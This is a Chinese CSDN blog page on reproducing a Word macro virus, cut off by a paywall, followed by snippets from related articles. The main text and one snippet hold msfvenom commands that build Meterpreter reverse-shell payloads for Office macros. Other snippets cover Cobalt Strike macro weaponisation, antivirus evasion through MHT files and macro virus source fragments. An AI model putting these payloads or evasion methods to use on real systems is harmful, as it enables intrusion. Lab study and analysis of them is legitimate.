宏病毒复现

最新推荐文章于 2024-06-28 16:12:25 发布
最新推荐文章于 2024-06-28 16:12:25 发布
阅读量1k 收藏 8
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23066945/article/details/102986019
版权

宏病毒复现

1、简单讲讲宏病毒

百度:宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。

运行成功能够直接getshell

2、msf生成宏病毒

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.1(当前主机的ip) lport=6666(当前主机端口) -f v
最低0.47元/天 解锁文章
TUANZI_Dum
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
MSF利用宏病毒感染word文档获取shell复现
永远是少年
06-14 2208
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。 一、环境准备 二、宏文档生成 三、效果检验
使用宏病毒反弹shell
qq_42671480的博客
05-23 936
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。那么,宏病毒是如何产生的呢? 准备环境 kali 攻击机 win7 靶机 生成payload 使用kali虚拟机,输入以下...
记录处理宏病毒的过程
最新发布
u013930899的博客
06-28 358
以下是堂弟个人电脑中毒的处理过程,作为网络安全从业人员,第一次遇到宏病毒,以前只是听过过这种病毒,从未见过。
宏病毒分析要点
weixin_42539095的博客
12-26 553
练习过一些宏病毒,总结一些最基本的方法 一.查看 提示启用内容,选择启用 Alt+F11即可查看宏代码 二.加密 部分宏加了密码 可以用如下工具破解 三.快速查找关键语句 大量简单的宏病毒直接在代码中搜索shell或者run即可找到关键的执行部分Ctrl+F,输入shell或者run查找,找到后下断点执行过来 选择左侧点击即可下断 然后运行 本地窗口查看,调试 添加监视即可看到关键部...
WPS Office宏病毒实现shell反弹
Zyecho的博客
10-21 2783
WPS Office宏病毒实现shell反弹
EXCEL startup.exe 宏病毒
weixin_34411563的博客
11-13 204
StartUp.xls宏病毒清除方法 第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls; 第二步:清除C:\Documents and Settings\administrator\Application Data\Micr...
利用MHT类型,免杀宏病毒
Sven的忘却日记
03-04 1958
首先使用Word创建一个利用宏代码弹MsgBox的样本,如下图: 保存内容后,另存为MHT格式文件 文件内容如下: 此时,再使用一些常用的ole分析工具,就识别不了这个类型了,比如正常的word文档可以使用压缩软件查看一些ole内部结构相关的数据 正常的word文档,使用7z查看 问题就在,如过把刚刚的2.mht 改成2.doc,完全不影响宏执行 ...
关于使用Cobalt Strike制作宏病毒
m0_52027565的博客
07-08 1987
关于使用Cobalt Strike制作宏病毒 事情的起因经过是这样的,那天晚上我正在埋头学习,突然小A走了过了,过来说他喜欢班花小B很久了,我一脸不相信的看着他,好家伙,竟然忍了整整一年,大一不表白,现在晚了吧?我看来看小A心想这小子突然开窍了吗?结果现实给了我一巴掌,小A说大一就想表白了,可他自己不确定小B到底喜不喜欢他,就一直拖着,直到大二。想让我帮忙查查小B的喜好,然后“投其所好”直接表白。我看在他一年单相思(不对是烧烤+啤酒)的份上,不忍心看着他单着,于是同意帮小A帮查查小B的喜好。...
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
热门推荐
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
过360云查杀工具(免杀工具)
03-14
过360云查杀工具 点击后自动隐藏 有可能被杀软防火墙误报病毒木马 请关闭杀软防火墙后重试 给大家分享下 密码 123
利用宏感染 word 文档获取windows系统的 shell
Cwillchris的博客
05-27 384
利用宏感染 word 文档获取window的 shell 实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) office 2016 实验步骤: 1、生成后门 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.98.30 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f vba-ex
宏病毒(1)
WLINX
12-09 612
样本HASH:02BA9703D1F250B411EA4C868D17FD2E 先打开样本,发现是老版的宏警告。 然后点击启用宏,ALT+F11查看宏代码(打开之前可以按住shift,防止一切宏运行,但很多时候不好使),然后找到宏开始的地方,然后开始调试。 CTRL+F8运行到光标处,然后F8开始单步。 Sub userNaveLoadr() Dim path_Nave...
脚本/宏病毒
flowerxxxxx的博客
06-30 670
一旦发现计算机Office软件打开后弹出系统警告框,并且无法“另存为”,就表示该文件已感染宏病毒,此时不能再打开其他文件,否则病毒也会感染,应马上关闭删除该文件。(3)用Win Hex分别打开notepad.exe和notepad_upx.exe文件(2分),再比较PE头部分,用语言描述有什么不同。在“受信任位置”中,删除“可靠来源”列表框中的不安全来源,根据实际情况设置是否信任所有安装的加载项和模板,设置宏的安全性;(3)描述清除病毒及加固的方法;(注:直接答在该题下面)(5分)
Word宏病毒
qq_43717119的博客
06-22 1万+
Word宏病毒 【实验目的】 1、演示宏的编写。 2、说明宏的原理及其安全漏洞和缺陷。 3、理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。 【实验环境】 在windows虚拟机中演示word宏病毒的发生机制,以及如何清除病毒的一系列操作宏病毒样本:自我复制及感染病毒(copy.txt)类台湾一号病毒(No1.txt) 实验注意事项:为了保证该试验不至于造成较大破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 【实验预备知识点】 Wo
恶意代码实验3:Word宏病毒实验
qq_63949327的博客
11-21 2011
只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。回答不正确三次,即可自动跳出病毒程序,但那时已经出现几十个文档。1、打开的宏编辑器如图所示,即可编写病毒代码。
台湾一号宏病毒原始源代码
家有恶妻 请勿靠近
08-01 7685
Taiwan No.1 病毒原始码  Dim Shared nm(4)  Sub MAIN  DisableInput 1  If Day(Now()) = 13 Then  try:    On Error Goto 0    On Error Goto try    test = - 1    con = 1    tog$ = ""    i =
Cobalt-Strike Office宏利用与免杀
weixin_48967543的博客
04-29 1666
1.打开Cobalt-Strike生产Office宏病毒。 首先需要设置监听器、因为钓鱼的目标比较单纯,在这里就不采用域前置技术。 然后使用攻击模块,生产Office宏病毒。 设置好监听器。 生成宏病毒 2.将宏病毒放入word 首先打开Word,在审阅中编辑宏: 创建新的宏: 将生成的宏病毒放入Microsoft Word目录下的ThisDocument,注意如果宏位置写错了很容易报错。 按下Ctrl+S,将文件保存为启用宏的Word文档,注意这里的作者需要修改,否则默认会使用账户名 此时带宏病毒的Wo.
宏病毒的传播机制与防治
"本文主要探讨了宏病毒猖獗的主要原因,并介绍了计算机病毒的工作方式和不同类型的病毒。宏病毒因其与平台无关性和文档传播特性而变得广泛流行。" 宏病毒猖獗的原因主要有两个方面: 1. 宏病毒感染的是文档而不是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值